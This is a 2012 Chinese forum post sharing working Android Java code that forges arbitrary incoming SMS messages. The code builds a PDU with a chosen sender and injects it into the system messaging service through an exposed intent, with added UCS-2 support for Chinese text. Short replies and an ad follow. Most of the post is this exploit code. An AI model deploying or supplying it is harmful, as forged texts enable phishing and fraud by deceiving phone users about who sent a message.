-
-
[分享]Android本地生成PDU伪造任意短信代码(支持中文GSM_UCS2)
-
2012-11-14 23:41
-
原理版主已经发过了,【分享】关于近期Android系统的任意构造短信漏洞
最近正好对这个漏洞比较感兴趣,从github上下了份代码一折腾,结果发中文短信时core了...
看了下原因,因为stackoverflow上那段createFakeSms()的TP_DCS是硬编码的0x00,并且没处理中文字符集的异常,最后导致发送的PDU是0字节
今天查了关于PDU编码的资料,照gsm/SmsMessage.java里增加了对GSM_UCS2的编码:
运行截图,Nexus S上发送带中文的PDU正常
ps: 坑爹的SDK国内完全下不动,最近各种
真是伤不起
最近正好对这个漏洞比较感兴趣,从github上下了份代码一折腾,结果发中文短信时core了...
看了下原因,因为stackoverflow上那段createFakeSms()的TP_DCS是硬编码的0x00,并且没处理中文字符集的异常,最后导致发送的PDU是0字节
今天查了关于PDU编码的资料,照gsm/SmsMessage.java里增加了对GSM_UCS2的编码:
private static void createFakeSms2(Context context, String sender, String body) {
//Source: http://stackoverflow.com/a/12338541
//Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
byte[] pdu = null;
byte[] scBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD("0000000000");
byte[] senderBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD(sender);
int lsmcs = scBytes.length;
byte[] dateBytes = new byte[7];
Calendar calendar = new GregorianCalendar();
dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
.get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
try {
ByteArrayOutputStream bo = new ByteArrayOutputStream();
bo.write(lsmcs);
bo.write(scBytes);
bo.write(0x04);
bo.write((byte) sender.length());
bo.write(senderBytes);
bo.write(0x00);
try {
String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
"stringToGsm7BitPacked", new Class[] { String.class });
stringToGsm7BitPacked.setAccessible(true);
byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null, body);
bo.write(0x00); // encoding: 0 for default 7bit
bo.write(dateBytes);
bo.write(bodybytes);
} catch (Exception e) {
try {
// try UCS-2
byte[] bodybytes = encodeUCS2(body, null);
bo.write(0x08); // encoding: 0x08 (GSM_UCS2) for UCS-2
bo.write(dateBytes);
bo.write(bodybytes);
} catch(UnsupportedEncodingException uex) {
Log.e("_DEBUG_", String.format("String '%s' encode unknow", body));
}
}
Log.d("_DEBUG_", String.format("PDU: ", bytesToHexString(bo.toByteArray())));
pdu = bo.toByteArray();
} catch (IOException e) {
}
Intent intent = new Intent();
intent.setClassName("com.android.mms",
"com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
intent.putExtra("format", "3gpp");
context.startService(intent);
}运行截图,Nexus S上发送带中文的PDU正常
ps: 坑爹的SDK国内完全下不动,最近各种
真是伤不起
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开 发者可享99元/年,续费同价!
|
|
|---|---|
|
|
|
|
|
|
|
|
 最近几天我也是上班就打开android的SDK Manager.exe来下载SDK、SOURCE,尼玛的,伤不起啊,不过这2天算是装下来了
|
|
|
Thanks for share.
|
|
|
|
|
|
|
|
|
|
|
|
 那天晚上想到ddms可以发送电话短信。。那如果root了。。就都能模仿了。。。第二天,不用root就能搞的新闻出来了
|
|
|
|
